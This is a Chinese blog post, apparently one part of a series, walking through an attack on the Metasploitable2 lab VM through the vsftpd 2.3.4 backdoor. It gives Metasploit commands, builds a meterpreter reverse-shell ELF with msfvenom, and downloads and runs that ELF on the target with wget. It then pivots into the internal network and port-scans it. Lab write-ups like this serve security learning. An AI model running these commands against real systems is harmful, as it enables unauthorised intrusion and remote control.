Metasploitable2靶机之第六篇--Vsftpd源码包后门漏洞 小鱼儿 2022-10-22 01:40 356阅读 0赞 ### 文章目录 ### * * * 环境 * 描述 * 原理 * 影响版本 * 漏洞复现 * * 第一部分 漏洞利用 * * 第一步 ,启动metasploit * 第二步选择漏洞库 * 第三步 设置参数,开始攻击 * 第四步 利用成功,执行命令 * 第二部分 反弹shell远程连接 * * 第一步 生成反弹shell * 第二步 启动本地Apache服务,并将backdoor.elf放置到服务器中 * 第三步 在目标主机上下载shell * 第四步 在msf终端上执行 * 第五步 在目标机上运行木马文件 * 第六步 查看反弹的Meterpreter终端 * 第三部分 内网信息收集 * * 第一步 查看ARP内容 * 第二步 设置跳板,使用autoroute命令来设置跳板 * 第三步 将Meterpreter会话切换到后台 * 第四步 内网主机端口扫描 * 第五步 验证192.168.232.129的80端口开放 * 摘抄 ### 环境 ### ### 描述 ### ### 原理 ### ### 影响版本 ### ### 漏洞复现 ### #### 第一部分 漏洞利用 #### ##### 第一步 ,启动metasploit ##### msfconsole ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70] ##### 第二步选择漏洞库 ##### search vsftp use exploit/unix/ftp/vsftpd_234_backdoor ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 1] ##### 第三步 设置参数,开始攻击 ##### show options Set RHOST 192.168.232.202 设置要攻击的机器IP run ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 2] ##### 第四步 利用成功,执行命令 ##### 验证 python -c ‘import pty;pty.spawn("/bin/sh")’ whaomi id ls ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 3] #### 第二部分 反弹shell远程连接 #### ##### 第一步 生成反弹shell ##### msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.232.128 LPORT=4444 -f elf > backdoor.elf ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 4] ##### 第二步 启动本地Apache服务,并将backdoor.elf放置到服务器中 ##### service apache2 start mv backdoor.elf /var/www/html/ ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 5] ##### 第三步 在目标主机上下载shell ##### wget http://192.168.232.198/backdoor.elf ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 6] ##### 第四步 在msf终端上执行 ##### msfconsoleuse exploit/multi/handler set payload linux/x86/meterpreter/reverse_tcp set LHOST 47.94.0.221 set LPORT 4444 exploit ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 7] ##### 第五步 在目标机上运行木马文件 ##### chmod 7777 backdoor.elf./backdoor.elf ![在这里插入图片描述][20210402215913500.png] ##### 第六步 查看反弹的Meterpreter终端 ##### ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 8] #### 第三部分 内网信息收集 #### ##### 第一步 查看ARP内容 ##### ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 9] ##### 第二步 设置跳板,使用autoroute命令来设置跳板 ##### run autoroute -prun autoroute -s 192.168.232.0 255.255.255.0 run autoroute -p ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 10] ##### 第三步 将Meterpreter会话切换到后台 ##### background sessions ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 11] ##### 第四步 内网主机端口扫描 ##### use auxiliary/scanner/portscan/tcpshow options set RHOSTS 192.168.232.129 run ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 12] ##### 第五步 验证192.168.232.129的80端口开放 ##### use auxiliary/scanner/http/http_versionshow options set RHOSTS 192.168.109.159 run ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 13] ### 摘抄 ### -------------------- 活着,就是为了在一片沙漠中, 寻找海市蜃楼般的快乐, 然后让荒芜的土地上,开满希望之花。 – 三毛 -------------------- [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70]: /images/20221022/7d6eeebb6bbe4cec9846d12fa9a1d6ff.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 1]: /images/20221022/22b648479d5e4ed29a219e1d9844437f.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 2]: /images/20221022/ce0d55a2778345f7900a899819b19814.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 3]: /images/20221022/6a656ab9375e44e9951ccec535ae936d.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 4]: /images/20221022/17f157cbaacb4afcb9cae6b9b25cb6b5.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 5]: /images/20221022/d350c523c528418084321c36bbfc39d4.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 6]: /images/20221022/142f90d294f34850be57de3ed5b7a7cf.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 7]: /images/20221022/6c2ec03717d141e59d0dda1d99fed4db.png [20210402215913500.png]: /images/20221022/a1ceb38182a949c384cf7d335ed55c62.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 8]: /images/20221022/39aee4976f994d4e9bcb111faf914118.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 9]: /images/20221022/53350312a6da424e8e0c4a5d765abbd9.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 10]: /images/20221022/fa6f10666eae4dbdb0024c5e2f2ffe14.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 11]: /images/20221022/74d96d370db540858c36c3ba9a10bb32.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 12]: /images/20221022/f2d49de4e4c548ba8ba2c572d3882aae.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 13]: /images/20221022/a01c348f962c4332b8cd0884f7dabee8.png
相关 Metasploitable2靶机之第三篇--Tomcat管理台弱口令漏洞 文章目录 环境搭建 描述 影响版本 漏洞利用 第一步 矫情吗;*/ 2022年11月16日 01:44/ 0 赞/ 224 阅读
相关 Metasploitable2靶机之第二篇--ssh密码获取 文章目录 环境 主机ssh弱口令 第一步 查看SSh端口是否开启 第二步 ゝ一世哀愁。/ 2022年11月16日 01:44/ 0 赞/ 225 阅读
相关 Metasploitable2靶机之第一篇--弱口令漏洞 文章目录 环境准备 telnet 弱口令 MySQL弱口令 PostgreSQL (对 淡淡的烟草味﹌/ 2022年11月16日 01:42/ 0 赞/ 244 阅读
相关 Metasploitable2靶机之第十一篇--Druby远程代码执行漏洞 文章目录 环境 漏洞利用 第一步 ,启动MSF 第二步选择 太过爱你忘了你带给我的痛/ 2022年10月22日 02:46/ 0 赞/ 220 阅读
相关 Metasploitable2靶机之第十篇--PHP CGI参数注入执行漏洞(cve-2012-1823) 文章目录 环境 原理 影响版本 漏洞利用 第一步 , 傷城~/ 2022年10月22日 02:46/ 0 赞/ 307 阅读
相关 Metasploitable2靶机之第八篇--UnreallRCd后门漏洞 文章目录 环境 漏洞利用 第一步 启动metasploit 电玩女神/ 2022年10月22日 02:46/ 0 赞/ 249 阅读
相关 Metasploitable2靶机之第九篇--Java RMI SERVER 命令执行漏洞 文章目录 环境 原理 漏洞利用 第一步 ,查看1099端口是否开启 ゝ一纸荒年。/ 2022年10月22日 02:46/ 0 赞/ 293 阅读
相关 Metasploitable2靶机之第七篇--Distcc后门漏洞 文章目录 环境 原理 漏洞利用 第一步 ,启动metasploit 约定不等于承诺〃/ 2022年10月22日 01:40/ 0 赞/ 242 阅读
还没有评论,来说两句吧...